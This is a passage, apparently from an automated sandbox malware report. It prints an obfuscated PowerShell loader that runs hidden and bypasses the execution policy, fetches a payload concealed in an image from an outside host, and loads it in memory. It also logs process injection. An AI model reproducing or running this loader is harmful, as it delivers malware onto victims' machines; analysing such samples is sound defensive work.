coUfwwBJMvZQBioUfwwBJMvEMoUfwwBJMvboUfwwBJMvBpoUfwwBJMvGUoUfwwBJMvbgB0oUfwwBJMvC4oUfwwBJMvRoUfwwBJMvBvoUfwwBJMvHcoUfwwBJMvbgBsoUfwwBJMvG8oUfwwBJMvYQBkoUfwwBJMvEQoUfwwBJMvYQB0oUfwwBJMvGEoUfwwBJMvKoUfwwBJMvoUfwwBJMvkoUfwwBJMvGkoUfwwBJMvbQBhoUfwwBJMvGcoUfwwBJMvZQBVoUfwwBJMvHIoUfwwBJMvboUfwwBJMvoUfwwBJMvpoUfwwBJMvDsoUfwwBJMvJoUfwwBJMvBpoUfwwBJMvG0oUfwwBJMvYQBnoUfwwBJMvGUoUfwwBJMvVoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvdoUfwwBJMvoUfwwBJMvgoUfwwBJMvD0oUfwwBJMvIoUfwwBJMvBboUfwwBJMvFMoUfwwBJMveQBzoUfwwBJMvHQoUfwwBJMvZQBtoUfwwBJMvC4oUfwwBJMvVoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvdoUfwwBJMvoUfwwBJMvuoUfwwBJMvEUoUfwwBJMvbgBjoUfwwBJMvG8oUfwwBJMvZoUfwwBJMvBpoUfwwBJMvG4oUfwwBJMvZwBdoUfwwBJMvDooUfwwBJMvOgBVoUfwwBJMvFQoUfwwBJMvRgoUfwwBJMv4oUfwwBJMvC4oUfwwBJMvRwBloUfwwBJMvHQoUfwwBJMvUwB0oUfwwBJMvHIoUfwwBJMvaQBuoUfwwBJMvGcoUfwwBJMvKoUfwwBJMvoUfwwBJMvkoUfwwBJMvGkoUfwwBJMvbQBhoUfwwBJMvGcoUfwwBJMvZQBCoUfwwBJMvHkoUfwwBJMvdoUfwwBJMvBloUfwwBJMvHMoUfwwBJMvKQoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEYoUfwwBJMvboUfwwBJMvBhoUfwwBJMvGcoUfwwBJMvIoUfwwBJMvoUfwwBJMv9oUfwwBJMvCoUfwwBJMvoUfwwBJMvJwoUfwwBJMv8oUfwwBJMvDwoUfwwBJMvQgBBoUfwwBJMvFMoUfwwBJMvRQoUfwwBJMv2oUfwwBJMvDQoUfwwBJMvXwBToUfwwBJMvFQoUfwwBJMvQQBSoUfwwBJMvFQoUfwwBJMvPgoUfwwBJMv+oUfwwBJMvCcoUfwwBJMvOwoUfwwBJMvkoUfwwBJMvGUoUfwwBJMvbgBkoUfwwBJMvEYoUfwwBJMvboUfwwBJMvBhoUfwwBJMvGcoUfwwBJMvIoUfwwBJMvoUfwwBJMv9oUfwwBJMvCoUfwwBJMvoUfwwBJMvJwoUfwwBJMv8oUfwwBJMvDwoUfwwBJMvQgBBoUfwwBJMvFMoUfwwBJMvRQoUfwwBJMv2oUfwwBJMvDQoUfwwBJMvXwBFoUfwwBJMvE4oUfwwBJMvRoUfwwBJMvoUfwwBJMv+oUfwwBJMvD4oUfwwBJMvJwoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEkoUfwwBJMvbgBkoUfwwBJMvGUoUfwwBJMveoUfwwBJMvoUfwwBJMvgoUfwwBJMvD0oUfwwBJMvIoUfwwBJMvoUfwwBJMvkoUfwwBJMvGkoUfwwBJMvbQBhoUfwwBJMvGcoUfwwBJMvZQBUoUfwwBJMvGUoUfwwBJMveoUfwwBJMvB0oUfwwBJMvC4oUfwwBJMvSQBuoUfwwBJMvGQoUfwwBJMvZQB4oUfwwBJMvE8oUfwwBJMvZgoUfwwBJMvooUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEYoUfwwBJMvboUfwwBJMvBhoUfwwBJMvGcoUfwwBJMvKQoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvZQBuoUfwwBJMvGQoUfwwBJMvSQBuoUfwwBJMvGQoUfwwBJMvZQB4oUfwwBJMvCoUfwwBJMvoUfwwBJMvPQoUfwwBJMvgoUfwwBJMvCQoUfwwBJMvaQBtoUfwwBJMvGEoUfwwBJMvZwBloUfwwBJMvFQoUfwwBJMvZQB4oUfwwBJMvHQoUfwwBJMvLgBJoUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvTwBmoUfwwBJMvCgoUfwwBJMvJoUfwwBJMvBloUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBGoUfwwBJMvGwoUfwwBJMvYQBnoUfwwBJMvCkoUfwwBJMvOwoUfwwBJMvkoUfwwBJMvHMoUfwwBJMvdoUfwwBJMvBhoUfwwBJMvHIoUfwwBJMvdoUfwwBJMvBJoUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvGcoUfwwBJMvZQoUfwwBJMvgoUfwwBJMvDoUfwwBJMvoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvGEoUfwwBJMvbgBkoUfwwBJMvCoUfwwBJMvoUfwwBJMvJoUfwwBJMvBloUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBJoUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvGcoUfwwBJMvdoUfwwBJMvoUfwwBJMvgoUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEkoUfwwBJMvbgBkoUfwwBJMvGUoUfwwBJMveoUfwwBJMvoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEkoUfwwBJMvbgBkoUfwwBJMvGUoUfwwBJMveoUfwwBJMvoUfwwBJMvgoUfwwBJMvCsoUfwwBJMvPQoUfwwBJMvgoUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEYoUfwwBJMvboUfwwBJMvBhoUfwwBJMvGcoUfwwBJMvLgBMoUfwwBJMvGUoUfwwBJMvbgBnoUfwwBJMvHQoUfwwBJMvaoUfwwBJMvoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvYgBhoUfwwBJMvHMoUfwwBJMvZQoUfwwBJMv2oUfwwBJMvDQoUfwwBJMvToUfwwBJMvBloUfwwBJMvG4oUfwwBJMvZwB0oUfwwBJMvGgoUfwwBJMvIoUfwwBJMvoUfwwBJMv9oUfwwBJMvCoUfwwBJMvoUfwwBJMvJoUfwwBJMvBloUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBJoUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvCoUfwwBJMvoUfwwBJMvJoUfwwBJMvBzoUfwwBJMvHQoUfwwBJMvYQByoUfwwBJMvHQoUfwwBJMvSQBuoUfwwBJMvGQoUfwwBJMvZQB4oUfwwBJMvDsoUfwwBJMvJoUfwwBJMvBioUfwwBJMvGEoUfwwBJMvcwBloUfwwBJMvDYoUfwwBJMvNoUfwwBJMvBDoUfwwBJMvG8oUfwwBJMvbQBtoUfwwBJMvGEoUfwwBJMvbgBkoUfwwBJMvCoUfwwBJMvoUfwwBJMvPQoUfwwBJMvgoUfwwBJMvCQoUfwwBJMvaQBtoUfwwBJMvGEoUfwwBJMvZwBloUfwwBJMvFQoUfwwBJMvZQB4oUfwwBJMvHQoUfwwBJMvLgBToUfwwBJMvHUoUfwwBJMvYgBzoUfwwBJMvHQoUfwwBJMvcgBpoUfwwBJMvG4oUfwwBJMvZwoUfwwBJMvooUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEkoUfwwBJMvbgBkoUfwwBJMvGUoUfwwBJMveoUfwwBJMvoUfwwBJMvsoUfwwBJMvCoUfwwBJMvoUfwwBJMvJoUfwwBJMvBioUfwwBJMvGEoUfwwBJMvcwBloUfwwBJMvDYoUfwwBJMvNoUfwwBJMvBMoUfwwBJMvGUoUfwwBJMvbgBnoUfwwBJMvHQoUfwwBJMvaoUfwwBJMvoUfwwBJMvpoUfwwBJMvDsoUfwwBJMvJoUfwwBJMvBjoUfwwBJMvG8oUfwwBJMvbQBtoUfwwBJMvGEoUfwwBJMvbgBkoUfwwBJMvEIoUfwwBJMveQB0oUfwwBJMvGUoUfwwBJMvcwoUfwwBJMvgoUfwwBJMvD0oUfwwBJMvIoUfwwBJMvBboUfwwBJMvFMoUfwwBJMveQBzoUfwwBJMvHQoUfwwBJMvZQBtoUfwwBJMvC4oUfwwBJMvQwBvoUfwwBJMvG4oUfwwBJMvdgBloUfwwBJMvHIoUfwwBJMvdoUfwwBJMvBdoUfwwBJMvDooUfwwBJMvOgBGoUfwwBJMvHIoUfwwBJMvbwBtoUfwwBJMvEIoUfwwBJMvYQBzoUfwwBJMvGUoUfwwBJMvNgoUfwwBJMv0oUfwwBJMvFMoUfwwBJMvdoUfwwBJMvByoUfwwBJMvGkoUfwwBJMvbgBnoUfwwBJMvCgoUfwwBJMvJoUfwwBJMvBioUfwwBJMvGEoUfwwBJMvcwBloUfwwBJMvDYoUfwwBJMvNoUfwwBJMvBDoUfwwBJMvG8oUfwwBJMvbQBtoUfwwBJMvGEoUfwwBJMvbgBkoUfwwBJMvCkoUfwwBJMvOwoUfwwBJMvkoUfwwBJMvGwoUfwwBJMvbwBhoUfwwBJMvGQoUfwwBJMvZQBkoUfwwBJMvEEoUfwwBJMvcwBzoUfwwBJMvGUoUfwwBJMvbQBioUfwwBJMvGwoUfwwBJMveQoUfwwBJMvgoUfwwBJMvD0oUfwwBJMvIoUfwwBJMvBboUfwwBJMvFMoUfwwBJMveQBzoUfwwBJMvHQoUfwwBJMvZQBtoUfwwBJMvC4oUfwwBJMvUgBloUfwwBJMvGYoUfwwBJMvboUfwwBJMvBloUfwwBJMvGMoUfwwBJMvdoUfwwBJMvBpoUfwwBJMvG8oUfwwBJMvbgoUfwwBJMvuoUfwwBJMvEEoUfwwBJMvcwBzoUfwwBJMvGUoUfwwBJMvbQBioUfwwBJMvGwoUfwwBJMveQBdoUfwwBJMvDooUfwwBJMvOgBMoUfwwBJMvG8oUfwwBJMvYQBkoUfwwBJMvCgoUfwwBJMvJoUfwwBJMvBjoUfwwBJMvG8oUfwwBJMvbQBtoUfwwBJMvGEoUfwwBJMvbgBkoUfwwBJMvEIoUfwwBJMveQB0oUfwwBJMvGUoUfwwBJMvcwoUfwwBJMvpoUfwwBJMvDsoUfwwBJMvJoUfwwBJMvB0oUfwwBJMvHkoUfwwBJMvcoUfwwBJMvBloUfwwBJMvCoUfwwBJMvoUfwwBJMvPQoUfwwBJMvgoUfwwBJMvCQoUfwwBJMvboUfwwBJMvBvoUfwwBJMvGEoUfwwBJMvZoUfwwBJMvBloUfwwBJMvGQoUfwwBJMvQQBzoUfwwBJMvHMoUfwwBJMvZQBtoUfwwBJMvGIoUfwwBJMvboUfwwBJMvB5oUfwwBJMvC4oUfwwBJMvRwBloUfwwBJMvHQoUfwwBJMvVoUfwwBJMvB5oUfwwBJMvHoUfwwBJMvoUfwwBJMvZQoUfwwBJMvooUfwwBJMvCcoUfwwBJMvRgBpoUfwwBJMvGIoUfwwBJMvZQByoUfwwBJMvC4oUfwwBJMvSoUfwwBJMvBvoUfwwBJMvG0oUfwwBJMvZQoUfwwBJMvnoUfwwBJMvCkoUfwwBJMvOwoUfwwBJMvkoUfwwBJMvG0oUfwwBJMvZQB0oUfwwBJMvGgoUfwwBJMvbwBkoUfwwBJMvCoUfwwBJMvoUfwwBJMvPQoUfwwBJMvgoUfwwBJMvCQoUfwwBJMvdoUfwwBJMvB5oUfwwBJMvHoUfwwBJMvoUfwwBJMvZQoUfwwBJMvuoUfwwBJMvEcoUfwwBJMvZQB0oUfwwBJMvE0oUfwwBJMvZQB0oUfwwBJMvGgoUfwwBJMvbwBkoUfwwBJMvCgoUfwwBJMvJwBWoUfwwBJMvEEoUfwwBJMvSQoUfwwBJMvnoUfwwBJMvCkoUfwwBJMvLgBJoUfwwBJMvG4oUfwwBJMvdgBvoUfwwBJMvGsoUfwwBJMvZQoUfwwBJMvooUfwwBJMvCQoUfwwBJMvbgB1oUfwwBJMvGwoUfwwBJMvboUfwwBJMvoUfwwBJMvsoUfwwBJMvCoUfwwBJMvoUfwwBJMvWwBvoUfwwBJMvGIoUfwwBJMvagBloUfwwBJMvGMoUfwwBJMvdoUfwwBJMvBboUfwwBJMvF0oUfwwBJMvXQoUfwwBJMvgoUfwwBJMvCgoUfwwBJMvJwBkoUfwwBJMvEgoUfwwBJMvaoUfwwBJMvoUfwwBJMvwoUfwwBJMvEwoUfwwBJMvawBKoUfwwBJMvE8oUfwwBJMvUwBDoUfwwBJMvDkoUfwwBJMvegBkoUfwwBJMvDIoUfwwBJMvOQBroUfwwBJMvGIoUfwwBJMvbQBsoUfwwBJMvDMoUfwwBJMvToUfwwBJMvB6oUfwwBJMvEUoUfwwBJMvNQBMoUfwwBJMvGooUfwwBJMvWQB1oUfwwBJMvE8oUfwwBJMvRoUfwwBJMvBroUfwwBJMvHUoUfwwBJMvTQBUoUfwwBJMvFEoUfwwBJMveoUfwwBJMvBMoUfwwBJMvHkoUfwwBJMvOoUfwwBJMvoUfwwBJMv2oUfwwBJMvGMoUfwwBJMvSoUfwwBJMvBSoUfwwBJMvDoUfwwBJMvoUfwwBJMvYQBBoUfwwBJMvD0oUfwwBJMvPQoUfwwBJMvnoUfwwBJMvCoUfwwBJMvoUfwwBJMvLoUfwwBJMvoUfwwBJMvgoUfwwBJMvCcoUfwwBJMvZoUfwwBJMvBmoUfwwBJMvGQoUfwwBJMvZgBkoUfwwBJMvCcoUfwwBJMvIoUfwwBJMvoUfwwBJMvsoUfwwBJMvCoUfwwBJMvoUfwwBJMvJwBkoUfwwBJMvGYoUfwwBJMvZoUfwwBJMvBmoUfwwBJMvCcoUfwwBJMvIoUfwwBJMvoUfwwBJMvsoUfwwBJMvCoUfwwBJMvoUfwwBJMvJwBkoUfwwBJMvGYoUfwwBJMvZoUfwwBJMvBmoUfwwBJMvCcoUfwwBJMvIoUfwwBJMvoUfwwBJMvsoUfwwBJMvCoUfwwBJMvoUfwwBJMvJwBkoUfwwBJMvGEoUfwwBJMvZoUfwwBJMvBzoUfwwBJMvGEoUfwwBJMvJwoUfwwBJMvgoUfwwBJMvCwoUfwwBJMvIoUfwwBJMvoUfwwBJMvnoUfwwBJMvGQoUfwwBJMvZQoUfwwBJMvnoUfwwBJMvCoUfwwBJMvoUfwwBJMvLoUfwwBJMvoUfwwBJMvgoUfwwBJMvCcoUfwwBJMvYwB1oUfwwBJMvCcoUfwwBJMvKQoUfwwBJMvpoUfwwBJMvoUfwwBJMv==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('oUfwwBJMv','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
Process injection Process 2272 resumed a thread in remote process 2568
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x0000039c
suspend_count: 1
process_identifier: 2568
1 0 0
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2164
thread_handle: 0x000002f4
process_identifier: 2160
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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JMvkoUfwwBJMvHMoUfwwBJMvdoUfwwBJMvBhoUfwwBJMvHIoUfwwBJMvdoUfwwBJMvBJoUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvGcoUfwwBJMvZQoUfwwBJMvgoUfwwBJMvDoUfwwBJMvoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvGEoUfwwBJMvbgBkoUfwwBJMvCoUfwwBJMvoUfwwBJMvJoUfwwBJMvBloUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBJoUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvGcoUfwwBJMvdoUfwwBJMvoUfwwBJMvgoUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEkoUfwwBJMvbgBkoUfwwBJMvGUoUfwwBJMveoUfwwBJMvoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEkoUfwwBJMvbgBkoUfwwBJMvGUoUfwwBJMveoUfwwBJMvoUfwwBJMvgoUfwwBJMvCsoUfwwBJMvPQoUfwwBJMvgoUfwwBJMvCQoUfwwBJMvcwB0oUfwwBJMvGEoUfwwBJMvcgB0oUfwwBJMvEYoUfwwBJMvboUfwwBJMvBhoUfwwBJMvGcoUfwwBJMvLgBMoUfwwBJMvGUoUfwwBJMvbgBnoUfwwBJMvHQoUfwwBJMvaoUfwwBJMvoUfwwBJMv7oUfwwBJMvCQoUfwwBJMvYgBhoUfwwBJMvHMoUfwwBJMvZQoUfwwBJMv2oUfwwBJMvDQoUfwwBJMvToUfwwBJMvBloUfwwBJMvG4oUfwwBJMvZwB0oUfwwBJMvGgoUfwwBJMvIoUfwwBJMvoUfwwBJMv9oUfwwBJMvCoUfwwBJMvoUfwwBJMvJoUfwwBJMvBloUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBJoUfwwBJMvG4oUfwwBJMvZoUfwwBJMvBloUfwwBJMvHgoUfwwBJMvIoUfwwBJMvoUfwwBJMvtoUfwwBJMvCoUfwwBJMvoUfwwBJMvJoUfwwBJMvBzoUfwwBJMvHQo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